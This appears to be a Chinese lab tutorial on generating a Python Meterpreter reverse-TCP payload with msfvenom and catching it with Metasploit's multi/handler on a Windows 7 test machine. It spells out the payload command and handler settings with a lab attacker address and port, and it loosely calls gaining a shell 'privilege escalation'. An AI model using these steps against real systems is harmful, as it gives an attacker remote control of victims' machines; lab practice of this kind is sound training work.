MSF渗透测试之msfvenom提权之python

MSF渗透测试之msfvenom提权之python,第1张

MSF渗透测试之msfvenom提权之python

python生成payload进行提权

文章目录
  • MSF渗透测试之msfvenom提权之python
  • 前言

  • 一、msfvenom是什么?


  • 二、使用步骤

    • 1.先生成python脚本
    • 2.终端执行python脚本
  • 总结

前言

一、msfvenom是什么?

msfvenom是MSF靶机中的一个后渗透提权工具


二、使用步骤 1.先生成python脚本

代码如下(示例):
msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.222.131 lport=5447 -f raw -o pythonshell.py

(2)然后在kali桌面生成一个python文件,编译打开进行复制

(3)打开msf,使用攻击模块
use exploit/multi/handler
(4)设置payload
set payload python/meterpreter/reverse_tcp
(5)options查看设置信息
(6)设置端口和主机
set lhost 192.168.222.131
set lport 5447

(7)run后打开win7终端。


2.终端执行python脚本


成功后回到kali提权成功
进入到meterperter界面,提权成功。


总结

本次实验是对msfvenom提权的Python进一次渗透。


进一步对msfvenom的熟练掌握。


欢迎分享,转载请注明来源:内存溢出

原文地址: https://outofmemory.cn/langs/570985.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-04-09
下一篇 2022-04-09

发表评论

登录后才能评论

评论列表(0条)

保存